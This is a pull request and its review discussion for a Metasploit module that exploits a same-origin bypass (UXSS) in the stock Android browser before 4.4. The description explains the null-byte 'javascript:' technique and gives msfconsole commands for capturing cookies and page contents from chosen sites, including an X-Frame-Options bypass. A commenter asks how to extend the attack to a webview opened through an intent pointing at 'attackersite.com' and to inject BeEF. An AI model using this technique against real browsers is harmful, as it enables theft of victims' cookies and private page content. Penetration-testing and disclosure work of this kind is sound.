### PR TITLE
Android < 4.4 AOSP (Stock) Browser UXSS: cross-domain cookie/response extraction module

### PR DESCRIPTION
**Pull request by jvennix-r7**
**tl;dr**: UXSS in AOSP browser allows for arbitrary cross-domain javascript.

I did not believe this at first, but after some testing it seems true: in AOSP browser before Android 4.4, you can load javascript into any arbitrary frame or window by prepending a NULL byte to a "javascript:..." string. This module automates loading and stealing HTML and cookies from cross-domain frames.

It was noticed at [1337day.com](http://1337day.com/exploit/description/22581) few days ago, and originally disclosed at [Rafay Hacking Articles](http://www.rafayhackingarticles.net/2014/08/android-browser-same-origin-policy.html).

I don't see a public advisory for this anywhere from the vendor. :(

Note: If the site you are trying to steal uses the X-Frame-Options header, you can enable `BYPASS_XFO` to serve a one-click exploit that pops open and reuses a window.
##### Verification
- [x] Configure the module to steal the contents/cookies of `example.com`:
  
  ```
  msf> use auxiliary/gather/android_stock_browser_uxss
  msf> set TARGET_URLS http://example.com
  msf> run
  ```
- [x] Run the module and browse to it in the Stock AOSP browser on any Android < 4.4
- [x] You should see the captured HTML contents and (empty) cookie stored as loot
- [ ] Configure the module to use the XFO bypass and steal the contents/cookies of `http://www.google.com,https://m.facebook.com,https://www.yahoo.com`:
  
  ```
  msf> use auxiliary/gather/android_stock_browser_uxss
  msf> set BYPASS_XFO true
  msf> set TARGET_URLS http://www.google.com,https://m.facebook.com,https://www.yahoo.com
  msf> run
  ```
- [x] Run the module and browse to it in the Stock AOSP browser on any Android < 4.4
- [x] Click the link. The exploit takes a lonnng time but should eventually load each URL individually
- [x] You should eventually see the captured HTML and (empty) cookie stored as loot

### CODE REVIEW

**Comment by dimpol** [comment]
Hi everyone, first of all a big thanks to @rafaybaloch for his help. I am trying to do the exact same thing but between a tab and a triggered web view in the browser (from a browsable intent). Meaning that i would like to access the triggered web views contents (e.g InnerHTML). So what i did was execute the msf module with set TARGET_URLS = intent:#Intent;S.url=http://attackersite.com;SEL;component=com.package.name/Activityname; Don't pay attention to what i am writing on the intent:# part just focus on the fact that the module creates a page that when visited by the victim a web view (from the app with the browsable intent) is triggered. So far everything is great. The thing is i am not yet able to get the triggered webview's contents like it would normally do on a page if we set TARGET_URLS = the page we want to target.  I think the triggered webview's contents should be accessible somehow just like the modules does for webpages.... any ideas? Ideally i would like to inject beef to the triggered webview.    *All that trouble because i am trying to prove that a browsable intent chained with SOP bypass is a serious attack.....
